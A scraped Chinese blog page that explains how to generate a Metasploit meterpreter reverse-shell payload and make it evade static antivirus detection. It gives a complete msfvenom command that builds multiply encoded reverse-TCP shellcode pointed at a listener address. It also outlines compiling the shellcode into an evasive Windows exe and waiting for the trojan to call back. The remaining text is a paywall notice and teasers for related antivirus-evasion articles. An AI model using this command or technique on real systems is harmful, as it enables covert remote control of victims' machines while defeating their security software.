MSF生成meterpreter及静态免杀

最新推荐文章于 2024-06-17 17:04:42 发布
最新推荐文章于 2024-06-17 17:04:42 发布
阅读量5.4k 收藏 17
点赞数
分类专栏: 渗透工具 文章标签: meterpreter
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/slip_666/article/details/79173707
版权
本文介绍了如何利用Meterpreter进行静态免杀。首先通过Kali命令行生成shellcode,选择合适的payload、编码方式和避免的字符。然后将shellcode手工编译为C文件并编译成免杀的exe。最后,在Kali上使用MSF框架开启监听,等待触发木马。
摘要由CSDN通过智能技术生成

1.静态免杀

1.1编译c文件,静态免杀

1.1.1 生成shellcode

在kali命令行输入

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '/x00' lhost=192.168.1.160 lport=7777 -f c -o /home/shell/test01.c

-p 选择payload
-e 选择使用的编码
-i 给payload编码的次数
-b 避免出现的字符
-f 输出文件类型
-o 输出文件目录

最低0.47元/天 解锁文章
斯利普
关注
  • 0
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
红队作业 | 免杀Meterpreter java马
Ms08067安全实验室
01-17 930
文章来源|MS08067 红队培训班 第5期本文作者:aeqaq(红队培训班5期学员)按老师要求尝试完成布置的作业如下:目标:分析msf meterpreter java马的原理,然后自己...
通过Python实现Payload分离免杀过程详解
09-16
### 通过Python实现Payload分离免杀过程详解 在网络安全领域,Payload分离技术是一种常见的方法,用于提高恶意软件的隐蔽性和生存能力。本文旨在详细介绍如何利用Python实现Payload的分离与免杀,通过具体示例帮助...
利用msfvenom制作windows木马及免杀
热门推荐
linxaiomo
04-10 1万+
实验环境:kali(10.250.70.251) Windows x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows,但是windowsping不通linux,查看linux的网关,然后将windows的网关和linux网关配置一致即可相互ping通。 第二步:打开kali启动msfvenom,制作木马 制作常规的木马: msfvenom -a x86 --platform window...
msf生成免杀木马
qq_56426046的博客
09-08 5574
1.修改特征码免杀的最基本思想就是破坏特征,这个特征有可能是特征码,有可能是行为特征,只要破坏了病毒与木马所固有的特征,并保证其原有功能没有改变,一次免杀就能完成了。(特征码:能识别一个程序是病毒的一段不大于64字节的特征串)就目前的反病毒技术来讲,更改特征码从而达到免杀的效果事实上包含着两种方式。一种是改特征码,这也是免杀的最初方法。例如一个文件在某一个地址内有“灰鸽子上线成功!”这么一句话,表明它就是木马,只要将相应地址内的那句话改成别的就可以了,如果是无关痛痒的,直接将其删掉也未尝不可。
msf免杀木马生成
qq_66985187的博客
07-04 2340
等黑客技术,所以难度很高,一般人不会或没能力接触这技术的深层内容。其内容基本上都是修改病毒、木马的内容改变特征码,从而躲避了杀毒软件的查杀。set payload windows/meterpreter/reverse_tcp#设置攻击位。本章是通过msfmsfvenom)命令实现免杀的操作。由于免杀技术的涉猎面非常广,其中包含反。简称"免杀",它指的是一种能使病毒木马免于被。补充:常见的后门生成方式!在kali中生成常见的木马命令。
MSF外网渗透+shellcode免杀
weixin_45605352的博客
04-19 4638
1. 内网穿透 使用的Sunny-Ngrok服务 。你在Sunny-Ngrok官网注册好后获得一条免费或付费的隧道,添加tcp通道,端口号自定。 官网链接:https://www.ngrok.cc/(Sunny-Ngrok服务 ) 在kali下安装Sunny-Ngrok的客户端,在该目录下启动Sunny-Ngrok。 2. 外网渗透 生成外网木马。注意这里的lhost和lport为赠送的域名和远程端口号: msfvenom -p windows/meterpreter/reverse_tcp lho
[ MSF ] Meterpreter扩展模块命令详解.docx
02-11
MeterpreterMetasploit 框架中的一个高级交互式后渗透工具,它允许渗透测试者在成功利用漏洞后与目标系统进行深度交互,执行多种高级操作。在网络安全和渗透测试领域,Meterpreter 是一种非常重要的工具,因为它...
关于如何使用shellter以及shielden对于正常软件的双重加壳,过火绒和360
07-16
1. **Shellter工具**:Shellter是一个能够将木马嵌入到正常软件中的工具,通过这种方式,可以有效地避开杀毒软件的检测,实现加壳免杀。它支持将恶意代码注入到32位的可执行文件中,以隐藏木马的行为。 2. **Kali ...
MSF-基本原则及团队模型
12-01
微软解决方案框架(MSF)是一种综合性的方法论,旨在帮助组织高效地管理和实施软件开发项目。MSF结合了项目管理的实践、团队建设的原则以及风险管理的策略,旨在提高项目的成功率和质量。 MSF的基本原理包括推动...
MSF(2)——各种木马的生成及简单的免杀
realmels的博客
06-11 4106
这里是各种木马的生成示例 在实际渗透过程中根据需求生成这里主要是php的免杀和Python的免杀,原理都是自定义加密及解密可参考前文 https://blog.csdn.net/realmels/article/details/119280877重点来了使用上文方法生成的木马,所有的木马都会报毒D盾扫描结果 火绒扫描结果 而对于exe的免杀比较复杂(主要我不会),所以在这里介绍一种简单的免杀方法。我们可以先生成一个Python的msf马,然后利用Python技术,对该木马进行免杀,最后将该木马打包成可
MSF实战免杀静态:ShellCode加花指令
xf555er的博客
03-30 1182
第一部分(api_call)是一个通用API调用函数,用于动态查找和调用API。第二部分(reverse_tcp)创建一个反向TCP连接,将本地机器连接到攻击者的监听器。第三部分(recv)负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode,用于反向连接攻击者机器并执行远程指令。
MSF编码+VS编译木马免杀
向阳-Y.的博客
03-16 2376
木马免杀
msf shellcode分离免杀技术
good good study
05-27 1927
一般的shellcode是直接放在程序里面执行,分离免杀是将恶意代码放置在程序本身之外的一种加载方式。本实验轻松绕过最新版火绒和360 msf免杀 shellcode分离免杀
简单的Msf木马免杀
weixin_47948655的博客
08-12 1170
简单加密shellcode与加载器实现msf木马免杀
免杀的N种姿势-msf免杀
m0_51268003的博客
04-02 910
原文地址:远控免杀专题文章(3)-msf免杀(VT免杀率35/69) 本人只为技术交流和自我记录笔记 对于原文作者和团队充满膜拜 如有侵权请联系本人删除文章 前言: 本地的安全工具下载安装会影响玩LOL 所以实验嘛 用在线查毒就好啦(virustotal.com) 未处理的payload(VT查杀率53/69) msf自编码处理(VT查杀率51/69) 使用msfvenom --list encoders可查看所有编码器 评级最高的两个encoder为cmd/powe...
免杀对抗-MSF\CS-shellcode反序列化
m0_62172162的博客
04-25 589
免杀对抗-MSF\CS-shellcode反序列化
免杀基本知识,shellcode混淆免杀
最新发布
白帽子凯哥聊黑客
06-17 1085
根据源代码我们看到在执行完call ebp以后,就执行了设置地址的操作,也就是说在shellcode中存在了反弹连接的ip地址,这里我们将生成的exe程序放到debug程序中,根据c的源代码,我们的shellcode是在call eax中,所以首先要搜索call eax步入进去以后就进入到shellcde中的代码,在shellcode中找到call ebp。最常见的就是360,刚刚上传的木马没有报毒,但是几分钟之内就会被检测为病毒程序,就是因为360会使用云查杀技术,这也是360查杀能力强的原因。
msf编码免杀
m0_61506558的博客
09-03 2542
自编码处理自捆绑+编码多重编码接口下载式签名伪装式
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值